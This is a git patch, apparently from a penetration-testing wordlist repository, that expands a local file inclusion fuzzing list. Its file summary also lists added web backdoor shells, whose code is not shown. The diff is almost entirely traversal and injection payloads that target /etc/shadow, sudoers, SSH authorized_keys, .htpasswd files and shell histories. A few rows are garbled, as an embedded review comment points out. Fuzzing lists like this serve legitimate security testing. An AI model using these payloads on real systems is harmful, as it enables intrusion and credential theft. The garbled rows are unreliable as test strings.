From 1574930a758c4f777db5fc6f71954d9a9ae96659 Mon Sep 17 00:00:00 2001
From: jhaddix
Date: Fri, 15 Mar 2013 15:44:46 -0700
Subject: [PATCH] updated LFI list and added laudanum shells
---
Fuzzing/JHADDIX_LFI.txt | 945 +++++++++---------
.../Web Backdoors/laudanum-0.8/._.DS_Store | Bin 0 -> 82 bytes
.../Web Backdoors/laudanum-0.8/CREDITS | 17 +
.../Backdoors/Web Backdoors/laudanum-0.8/GPL | 258 +++++
.../Web Backdoors/laudanum-0.8/README | 35 +
.../laudanum-0.8/asp/._.DS_Store | Bin 0 -> 82 bytes
.../Web Backdoors/laudanum-0.8/asp/dns.asp | 153 +++
.../Web Backdoors/laudanum-0.8/asp/file.asp | 179 ++++
.../Web Backdoors/laudanum-0.8/asp/proxy.asp | 454 +++++++++
.../Web Backdoors/laudanum-0.8/asp/shell.asp | 83 ++
.../laudanum-0.8/aspx/._.DS_Store | Bin 0 -> 82 bytes
.../Web Backdoors/laudanum-0.8/aspx/dns.aspx | 144 +++
.../Web Backdoors/laudanum-0.8/aspx/file.aspx | 154 +++
.../laudanum-0.8/aspx/shell.aspx | 129 +++
.../laudanum-0.8/cfm/._.DS_Store | Bin 0 -> 82 bytes
.../Web Backdoors/laudanum-0.8/cfm/shell.cfm | 80 ++
.../laudanum-0.8/jsp/._.DS_Store | Bin 0 -> 82 bytes
.../Web Backdoors/laudanum-0.8/jsp/cmd.war | Bin 0 -> 1203 bytes
.../Web Backdoors/laudanum-0.8/jsp/makewar.sh | 3 +
.../laudanum-0.8/jsp/warfiles/._.DS_Store | Bin 0 -> 82 bytes
.../jsp/warfiles/META-INF/._.DS_Store | Bin 0 -> 82 bytes
.../jsp/warfiles/META-INF/MANIFEST.MF | 3 +
.../jsp/warfiles/WEB-INF/._.DS_Store | Bin 0 -> 82 bytes
.../laudanum-0.8/jsp/warfiles/WEB-INF/web.xml | 11 +
.../laudanum-0.8/jsp/warfiles/cmd.jsp | 41 +
.../laudanum-0.8/php/._.DS_Store | Bin 0 -> 82 bytes
.../Web Backdoors/laudanum-0.8/php/dns.php | 161 +++
.../Web Backdoors/laudanum-0.8/php/file.php | 195 ++++
.../laudanum-0.8/php/php-reverse-shell.php | 192 ++++
.../Web Backdoors/laudanum-0.8/php/proxy.php | 351 +++++++
.../Web Backdoors/laudanum-0.8/php/shell.php | 409 ++++++++
31 files changed, 3539 insertions(+), 458 deletions(-)
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/._.DS_Store
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/CREDITS
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/GPL
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/README
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/._.DS_Store
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/dns.asp
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/file.asp
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/proxy.asp
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/shell.asp
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/._.DS_Store
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/dns.aspx
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/file.aspx
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/shell.aspx
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/._.DS_Store
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/shell.cfm
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/._.DS_Store
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/cmd.war
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/makewar.sh
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/._.DS_Store
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/._.DS_Store
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/._.DS_Store
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/cmd.jsp
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/._.DS_Store
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/dns.php
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/file.php
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/php-reverse-shell.php
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/proxy.php
create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/shell.php
diff --git a/Fuzzing/JHADDIX_LFI.txt b/Fuzzing/JHADDIX_LFI.txt
index a49c75e..8c66b3f 100644
--- a/Fuzzing/JHADDIX_LFI.txt
+++ b/Fuzzing/JHADDIX_LFI.txt
@@ -1,179 +1,352 @@ +/.../.../.../.../.../ +\…..\\\…..\\\…..\\\ %00../../../../../../etc/passwd -%00../../../../../../etc/shadow %00/etc/passwd%00 +%00../../../../../../etc/shadow %00/etc/shadow%00 %0a/bin/cat%20/etc/passwd %0a/bin/cat%20/etc/shadow -%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini +/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 -..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini -../../../../../../../../../../../../boot.ini -../../../../../../../../../../../../boot.ini%00 -../../../../../../../../../../../../etc/hosts -../../../../../../../../../../../../etc/hosts%00 -../../../../../../../../../../../../etc/passwd -../../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../../../etc/shadow -../../../../../../../../../../../../etc/shadow%00 -../../../../../../../../../../../../localstart.asp -../../../../../../../../../../../../localstart.asp%00 -../../../../../../../../conf/server.xml -../../../../../apache/logs/access.log -../../../../../apache/logs/error.log -../../../../../etc/httpd/logs/access.log -../../../../../etc/httpd/logs/access_log -../../../../../etc/httpd/logs/error.log -../../../../../etc/httpd/logs/error_log -../../../../../logs/access.log -../../../../../logs/error.log -../../../../../usr/local/apache/logs/access.log -../../../../../usr/local/apache/logs/access_log -../../../../../usr/local/apache/logs/error.log -../../../../../usr/local/apache/logs/error_log -../../../../../var/log/access_log -../../../../../var/log/apache/access.log -../../../../../var/log/apache/access_log 
-../../../../../var/log/apache/error.log -../../../../../var/log/apache/error_log -../../../../../var/log/error_log -../../../../../var/log/httpd/access_log -../../../../../var/log/httpd/error_log -../../../../../var/www/logs/access.log -../../../../../var/www/logs/error.log -../../../../../var/www/logs/error_log -../../../../apache/logs/access.log -../../../../apache/logs/error.log -../../../../logs/access.log -../../../../logs/error.log -../../../apache/logs/access.log -../../../apache/logs/error.log -../../../logs/access.log -../../../logs/error.log -../../apache/logs/access.log -../../apache/logs/error.log -../../boot.ini -../../logs/access.log -../../logs/error.log -../apache/logs/access.log -../apache/logs/error.log -../logs/access.log -../logs/error.log -..\..\..\..\..\..\..\..\..\..\boot.ini -..\..\..\..\..\..\..\..\..\..\boot.ini%00 -..\..\..\..\..\..\..\..\..\..\etc\passwd -..\..\..\..\..\..\..\..\..\..\etc\passwd%00 -..\..\..\..\..\..\..\..\..\..\etc\shadow -..\..\..\..\..\..\..\..\..\..\etc\shadow%00 -.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd -.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow -/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 +%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini +/../../../../../../../../%2A /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow -/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd -/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow -/.../.../.../.../.../ -/../../../../../../../../%2A 
+..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd +..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow +..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed +..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd +..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow +=3D “/..” . “%2f.. +..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini +admin/access_log +/admin/install.php +../../../administrator/inbox +/apache2/logs/access_log +/apache2/logs/access.log +/apache2/logs/error_log +/apache2/logs/error.log +/apache/logs/access_log +/apache/logs/access.log +../../../../../apache/logs/access.log +../../../../apache/logs/access.log +../../../apache/logs/access.log +../../apache/logs/access.log +../apache/logs/access.log +/apache/logs/error_log +/apache/logs/error.log +../../../../../apache/logs/error.log +../../../../apache/logs/error.log +../../../apache/logs/error.log +../../apache/logs/error.log +../apache/logs/error.log +/apache\php\php.ini +\\'/bin/cat%20/etc/passwd\\' +\\'/bin/cat%20/etc/shadow\\' +/.bash_history +/.bash_profile +/.bashrc +/../../../../../../../../bin/id| +/bin/php.ini +/boot/grub/grub.conf +/./././././././././././boot.ini /../../../../../../../../../../../boot.ini +/..\../..\../..\../..\../..\../..\../boot.ini +/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini +..//..//..//..//..//boot.ini +../../../../../../../../../../../../boot.ini +../../boot.ini +..\../..\../..\../..\../boot.ini +..\../..\../boot.ini +..\..\..\..\..\..\..\..\..\..\boot.ini +\..\..\..\..\..\..\..\..\..\..\boot.ini /../../../../../../../../../../../boot.ini%00 +../../../../../../../../../../../../boot.ini%00 +..\..\..\..\..\..\..\..\..\..\boot.ini%00 /../../../../../../../../../../../boot.ini%00.html /../../../../../../../../../../../boot.ini%00.jpg -/../../../../../../../../../../../etc/passwd%00.html -/../../../../../../../../../../../etc/passwd%00.jpg -/../../../../../../../../../../etc/passwd -/../../../../../../../../../../etc/passwd^^ -/../../../../../../../../../../etc/shadow 
-/../../../../../../../../../../etc/shadow^^ -/../../../../../../../../bin/id| -/../../var/www/logs/access_log -/..\../..\../..\../..\../..\../..\../boot.ini -/..\../..\../..\../..\../..\../..\../etc/passwd -/..\../..\../..\../..\../..\../..\../etc/shadow -/./././././././././././boot.ini -/./././././././././././etc/passwd -/./././././././././././etc/shadow -/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini -/NetServer\bin\stable\apache\php.ini -/PHP\php.ini -/Program Files\Apache Group\Apache2\conf\httpd.conf -/Program Files\Apache Group\Apache\conf\httpd.conf -/Program Files\Apache Group\Apache\logs\access.log -/Program Files\Apache Group\Apache\logs\error.log -/Program Files\xampp\apache\conf\httpd.conf -/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf -/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf -/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf -/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php -/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini -/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php -/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php -/Volumes/webBackup/opt/apache2/conf/httpd.conf -/Volumes/webBackup/private/etc/httpd/httpd.conf -/Volumes/webBackup/private/etc/httpd/httpd.conf.default -/WINDOWS\php.ini -/WINNT\php.ini -/apache/logs/access.log -/apache/logs/error.log -/apache2/logs/access.log -/apache2/logs/error.log -/apache\php\php.ini -/bin/php.ini -/etc/apache/apache.conf -/etc/apache/conf/httpd.conf -/etc/apache/httpd.conf +/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd +..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini +/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd +/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow +c:\apache\logs\access.log +c:\apache\logs\error.log +c:\AppServ\MySQL +C:/boot.ini +C:\boot.ini +/C:/inetpub/ftproot/ +C:/inetpub/wwwroot/global.asa +C:\inetpub\wwwroot\global.asa +c:\inetpub\wwwroot\index.asp +/config.asp +../config.asp 
+config.asp +../config.inc.php +config.inc.php +../config.js +config.js +_config.php +../_config.php +../config.php +config.php +../_config.php%00 +../../../../../../../../conf/server.xml +/core/config.php +/C:\Program Files\ +c:\Program Files\Apache Group\Apache\logs\access.log +c:\Program Files\Apache Group\Apache\logs\error.log +/.cshrc +c:\System32\Inetsrv\metabase.xml +c:WINDOWS/system32/ +d:\AppServ\MySQL +database.asp +database.js +database.php +data.php +dbase.php a +db.php +../../../../../../../dev +/D:\Program Files\ +d:\System32\Inetsrv\metabase.xml /etc/apache2/apache2.conf /etc/apache2/conf/httpd.conf /etc/apache2/httpd.conf /etc/apache2/sites-available/default /etc/apache2/vhosts.d/default_vhost.include +/etc/apache/apache.conf +/etc/apache/conf/httpd.conf +/etc/apache/httpd.conf +/etc/apt/sources.list /etc/chrootUsers +/etc/crontab +/etc/defaultdomain +/etc/default/passwd +/etc/defaultrouter +/etc/fstab /etc/ftpchroot /etc/ftphosts /etc/group +/etc/hostname.bge +/etc/hostname.ce0 +/etc/hostname.ce1 +/etc/hostname.ce2 +/etc/hostname.ce3 +/etc/hostname.dcelx0 +/etc/hostname.dcelx1 +/etc/hostname.dcelx2 +/etc/hostname.dcelx3 +/etc/hostname.dmfe0 +/etc/hostname.dmfe1 +/etc/hostname.dmfe2 +/etc/hostname.dmfe3 +/etc/hostname.dnet0 +/etc/hostname.dnet1 +/etc/hostname.dnet2 +/etc/hostname.dnet3 +/etc/hostname.ecn0 +/etc/hostname.ecn1 +/etc/hostname.ecn2 +/etc/hostname.ecn3 +/etc/hostname.elx0 +/etc/hostname.elx1 +/etc/hostname.elx2 +/etc/hostname.elx3 +/etc/hostname.elxl0 +/etc/hostname.elxl1 +/etc/hostname.elxl2 +/etc/hostname.elxl3 +/etc/hostname.eri0 +/etc/hostname.eri1 +/etc/hostname.eri2 +/etc/hostname.eri3 +/etc/hostname.ge0 +/etc/hostname.ge1 +/etc/hostname.ge2 +/etc/hostname.ge3 +/etc/hostname.hme0 +/etc/hostname.hme1 +/etc/hostname.hme2 +/etc/hostname.hme3 +/etc/hostname.ieef0 +/etc/hostname.ieef1 +/etc/hostname.ieef2 +/etc/hostname.ieef3 +/etc/hostname.iprb0 +/etc/hostname.iprb1 +/etc/hostname.iprb2 +/etc/hostname.iprb3 +/etc/hostname.le0 
+/etc/hostname.le1 +/etc/hostname.le2 +/etc/hostname.le3 +/etc/hostname.lo +/etc/hostname.pcn0 +/etc/hostname.pcn1 +/etc/hostname.pcn2 +/etc/hostname.pcn3 +/etc/hostname.qfe0 +/etc/hostname.qfe1 +/etc/hostname.qfe2 +/etc/hostname.qfe3 +/etc/hostname.spwr0 +/etc/hostname.spwr1 +/etc/hostname.spwr2 +/etc/hostname.spwr3 +/etc/hosts +../../../../../../../../../../../../etc/hosts +../../../../../../../../../../../../etc/hosts%00 +/etc/hosts.allow +/etc/hosts.deny +/etc/hosts.equiv /etc/http/conf/httpd.conf -/etc/http/httpd.conf /etc/httpd.conf +/etc/httpd/conf.d/php.conf +/etc/httpd/conf.d/squirrelmail.conf +/etc/httpd/conf.d/ssl.conf /etc/httpd/conf/httpd.conf /etc/httpd/httpd.conf -/etc/httpd/logs/acces.log /etc/httpd/logs/acces_log -/etc/httpd/logs/access.log +/etc/httpd/logs/acces.log +../../../../../../../etc/httpd/logs/acces_log +../../../../../../../etc/httpd/logs/acces.log /etc/httpd/logs/access_log -/etc/httpd/logs/error.log +/etc/httpd/logs/access.log +../../../../../etc/httpd/logs/access_log +../../../../../etc/httpd/logs/access.log /etc/httpd/logs/error_log +/etc/httpd/logs/error.log +../../../../../../../etc/httpd/logs/error_log +../../../../../../../etc/httpd/logs/error.log +../../../../../etc/httpd/logs/error_log +../../../../../etc/httpd/logs/error.log /etc/httpd/php.ini +/etc/http/httpd.conf +/etc/inetd.conf /etc/init.d/apache /etc/init.d/apache2 +/etc/issue /etc/logrotate.d/ftp +/etc/logrotate.d/httpd /etc/logrotate.d/proftpd /etc/logrotate.d/vsftpd.log /etc/mail/access +/etc/mailman/mm_cfg.py +/etc/make.conf +/etc/master.passwd +/etc/motd /etc/my.cnf /etc/mysql/my.cnf -/etc/php.ini -/etc/php/apache/php.ini -/etc/php/apache2/php.ini -/etc/php/cgi/php.ini -/etc/php/php.ini -/etc/php/php4/php.ini +/etc/netconfig +/etc/nsswitch.conf +/etc/opt/ipf/ipf.conf +/etc/opt/ipf/ipnat.conf +/./././././././././././etc/passwd +/../../../../../../../../../../etc/passwd +/../../../../../../../../../../etc/passwd^^ +/..\../..\../..\../..\../..\../..\../etc/passwd 
+/etc/passwd +../../../../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../etc/passwd +../../../../../../../../../../etc/passwd +../../../../../../../../../etc/passwd +../../../../../../../../etc/passwd +../../../../../../../etc/passwd +../../../../../../etc/passwd +../../../../../etc/passwd +../../../../etc/passwd +../../../etc/passwd +../../etc/passwd +../etc/passwd +..\..\..\..\..\..\..\..\..\..\etc\passwd +.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd +\..\..\..\..\..\..\..\..\..\..\etc\passwd +etc/passwd +/etc/passwd%00 +../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../etc/passwd%00 
+../../../../../../../../../../etc/passwd%00 +../../../../../../../../../etc/passwd%00 +../../../../../../../../etc/passwd%00 +../../../../../../../etc/passwd%00 +../../../../../../etc/passwd%00 +../../../../../etc/passwd%00 +../../../../etc/passwd%00 +../../../etc/passwd%00 +../../etc/passwd%00 +../etc/passwd%00 +..\..\..\..\..\..\..\..\..\..\etc\passwd%00 +\..\..\..\..\..\..\..\..\..\..\etc\passwd%00 +/../../../../../../../../../../../etc/passwd%00.html +/../../../../../../../../../../../etc/passwd%00.jpg +../../../../../../etc/passwd&=%3C%3C%3C%3C /etc/php4.4/fcgi/php.ini -/etc/php4/apache/php.ini /etc/php4/apache2/php.ini +/etc/php4/apache/php.ini /etc/php4/cgi/php.ini -/etc/php5/apache/php.ini /etc/php5/apache2/php.ini +/etc/php5/apache/php.ini /etc/php5/cgi/php.ini +/etc/php/apache2/php.ini +/etc/php/apache/php.ini +/etc/php/cgi/php.ini +/etc/php.d/dom.ini +/etc/php.d/gd.ini +/etc/php.d/imap.ini +/etc/php.d/json.ini +/etc/php.d/ldap.ini +/etc/php.d/mbstring.ini +/etc/php.d/mysqli.ini +/etc/php.d/mysql.ini +/etc/php.d/odbc.ini +/etc/php.d/pdo.ini +/etc/php.d/pdo_mysql.ini +/etc/php.d/pdo_odbc.ini +/etc/php.d/pdo_pgsql.ini +/etc/php.d/pdo_sqlite.ini +/etc/php.d/pgsql.ini +/etc/php.d/xmlreader.ini +/etc/php.d/xmlwriter.ini +/etc/php.d/xsl.ini +/etc/php.d/zip.ini +/etc/php.ini +/etc/php/php4/php.ini +/etc/php/php.ini +/etc/postfix/mydomains /etc/proftp.conf /etc/proftpd/modules.conf /etc/protpd/proftpd.conf /etc/pure-ftpd.conf +/etc/pureftpd.passwd +/etc/pureftpd.pdb /etc/pure-ftpd/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.pdb /etc/pure-ftpd/pureftpd.pdb -/etc/pureftpd.passwd -/etc/pureftpd.pdb +/etc/release +/etc/resolv.conf +/etc/rpc /etc/security/environ /etc/security/failedlogin /etc/security/group 
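Review bot: Several rows added in this hunk look like paste or encoding residue rather than path strings: `+=3D “/..” . “%2f..` carries a quoted-printable `=3D` and curly quotes, `+\…..\\\…..\\\…..\\\` holds a U+2026 ellipsis where three dots were presumably meant, and `+dbase.php a` ends in a stray token. The `@@ -191,71 +384,141 @@` hunk has the same problem in its new `access_ log`, `access. log`, `error_l og` and `error.l og` rows, which contain a space inside the filename. Anyone using the list to check a traversal filter or WAF rule never sends the intended string for those rows, so the result overstates coverage. I would normalise them to plain ASCII and remove the embedded spaces before merging; the page shows the hunk with its line breaks collapsed, so the row boundaries here are inferred.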
@@ -181,8 +354,28 @@ /etc/security/limits /etc/security/passwd /etc/security/user +/./././././././././././etc/shadow +/../../../../../../../../../../etc/shadow +/../../../../../../../../../../etc/shadow^^ +/..\../..\../..\../..\../..\../..\../etc/shadow /etc/shadow +../../../../../../../../../../../../etc/shadow +..\..\..\..\..\..\..\..\..\..\etc\shadow +.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow +\..\..\..\..\..\..\..\..\..\..\etc\shadow +../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00 +../../../../../../../../../../../../etc/shadow%00 +..\..\..\..\..\..\..\..\..\..\etc\shadow%00 +\..\..\..\..\..\..\..\..\..\..\etc\shadow%00 +etc/shadow%00 +/etc/ssh/sshd_config +/etc/sudoers +/etc/syslog.conf +/etc/syslogd.conf +/etc/system +/etc/updatedb.conf /etc/utmp +/etc/vfstab /etc/vhcs2/proftpd/proftpd.conf /etc/vsftpd.chroot_list /etc/vsftpd.conf 
@@ -191,71 +384,141 @@ /etc/wu-ftpd/ftpaccess /etc/wu-ftpd/ftphosts /etc/wu-ftpd/ftpusers +/.forward +/home2\bin\stable\apache\php.ini /home/apache/conf/httpd.conf /home/apache/httpd.conf -/home2\bin\stable\apache\php.ini /home\bin\stable\apache\php.ini +/.htpasswd +.htpasswd +../.htpasswd +../install.php +install.php +../../../../../../../../../../../../localstart.asp +../../../../../../../../../../../../localstart.asp%00 +/log/miscDir/accesslog +/.logout +/logs/access_log /logs/access.log +../../../../../logs/access.log +../../../../logs/access.log +../../../logs/access.log +../../logs/access.log +../logs/access.log +/logs/error_log /logs/error.log +../../../../../logs/error.log +../../../../logs/error.log +../../../logs/error.log +../../logs/error.log +../logs/error.log /logs/pure-ftpd.log -/opt/apache/conf/httpd.conf +/master.passwd +member/.htpasswd +members/.htpasswd +/.netrc +/NetServer\bin\stable\apache\php.ini /opt/apache2/conf/httpd.conf -/opt/lampp/logs/access.log +/opt/apache/conf/httpd.conf /opt/lampp/logs/access_log -/opt/lampp/logs/error.log +/opt/lampp/logs/access.log /opt/lampp/logs/error_log +/opt/lampp/logs/error.log /opt/xampp/etc/php.ini -/opt/xampp/logs/access.log /opt/xampp/logs/access_log -/opt/xampp/logs/error.log +/opt/xampp/logs/access.log /opt/xampp/logs/error_log +/opt/xampp/logs/error.log +.pass +../.pass +pass.dat +passwd +/.passwd +.passwd +../.passwd +passwd.dat /php4\php.ini /php5\php.ini /php\php.ini +/PHP\php.ini /private/etc/httpd/httpd.conf /private/etc/httpd/httpd.conf.default +/proc/cpuinfo +/proc/interrupts +/proc/loadavg +/proc/meminfo +/proc/mounts +/proc/net/arp +/proc/net/dev +/proc/net/route +/proc/net/tcp +/proc/partitions /proc/self/cmdline /proc/self/envron -/root/.Xauthority +/proc/version +/.profile +/Program Files\Apache Group\Apache2\conf\httpd.conf +/Program Files\Apache Group\Apache\conf\httpd.conf +/Program Files\Apache Group\Apache\logs\access.log +/Program Files\Apache Group\Apache\logs\error.log +/Program 
Files\xampp\apache\conf\httpd.conf +/../../../../pswd +/.rhosts /root/.bash_history /root/.bash_logut +root/.htpasswd /root/.ksh_history -/usr/apache/conf/httpd.conf +/root/.Xauthority +/.sh_history +/.shosts +/.ssh/authorized_keys +user/.htpasswd +../users.db.php +users.db.php +users/.htpasswd /usr/apache2/conf/httpd.conf +/usr/apache/conf/httpd.conf /usr/etc/pure-ftpd.conf /usr/lib/cron/log /usr/lib/php.ini /usr/lib/php/php.ini /usr/lib/security/mkuser.default -/usr/local/Zend/etc/php.ini +/usr/local/apache2/conf/httpd.conf +/usr/local/apache2/httpd.conf +/usr/local/apache2/logs/access_log +/usr/local/apache2/logs/access.log +/usr/local/apache2/logs/error_log +/usr/local/apache2/logs/error.log /usr/local/apache/conf/httpd.conf /usr/local/apache/conf/php.ini /usr/local/apache/httpd.conf /usr/local/apache/log /usr/local/apache/logs -/usr/local/apache/logs/access. log -/usr/local/apache/logs/access.log -/usr/local/apache/logs/access_ log /usr/local/apache/logs/access_log -/usr/local/apache/logs/error.log +/usr/local/apache/logs/access_ log +/usr/local/apache/logs/access.log +/usr/local/apache/logs/access. log +../../../../../../../usr/local/apache/logs/access_ log +../../../../../../../usr/local/apache/logs/access. 
log +../../../../../usr/local/apache/logs/access_log +../../../../../usr/local/apache/logs/access.log /usr/local/apache/logs/error_log -/usr/local/apache2/conf/httpd.conf -/usr/local/apache2/httpd.conf -/usr/local/apache2/logs/access.log -/usr/local/apache2/logs/access_log -/usr/local/apache2/logs/error.log -/usr/local/apache2/logs/error_log -/usr/local/apps/apache/conf/httpd.conf +/usr/local/apache/logs/error.log +../../../../../../../usr/local/apache/logs/error_l og +../../../../../../../usr/local/apache/logs/error.l og +../../../../../usr/local/apache/logs/error_log +../../../../../usr/local/apache/logs/error.log /usr/local/apps/apache2/conf/httpd.conf +/usr/local/apps/apache/conf/httpd.conf /usr/local/cpanel/logs /usr/local/cpanel/logs/access_log /usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log /usr/local/cpanel/logs/stats_log +/usr/local/etc/apache2/conf/httpd.conf /usr/local/etc/apache/conf/httpd.conf /usr/local/etc/apache/vhosts.conf -/usr/local/etc/apache2/conf/httpd.conf /usr/local/etc/httpd/conf/httpd.conf /usr/local/etc/httpd/logs/access_log /usr/local/etc/httpd/logs/error_log @@ -264,19 +527,20 @@ /usr/local/etc/pureftpd.pdb /usr/local/httpd/conf/httpd.conf /usr/local/lib/php.ini -/usr/local/php/httpd.conf -/usr/local/php/httpd.conf.php -/usr/local/php/lib/php.ini /usr/local/php4/httpd.conf /usr/local/php4/httpd.conf.php /usr/local/php4/lib/php.ini /usr/local/php5/httpd.conf /usr/local/php5/httpd.conf.php /usr/local/php5/lib/php.ini +/usr/local/php/httpd.conf +/usr/local/php/httpd.conf.php +/usr/local/php/lib/php.ini /usr/local/pureftpd/etc/pure-ftpd.conf /usr/local/pureftpd/etc/pureftpd.pdb /usr/local/pureftpd/sbin/pure-config.pl /usr/local/www/logs/thttpd_log +/usr/local/Zend/etc/php.ini /usr/pkgsrc/net/pureftpd/ /usr/ports/contrib/pure-ftpd/ /usr/ports/ftp/pure-ftpd/ 
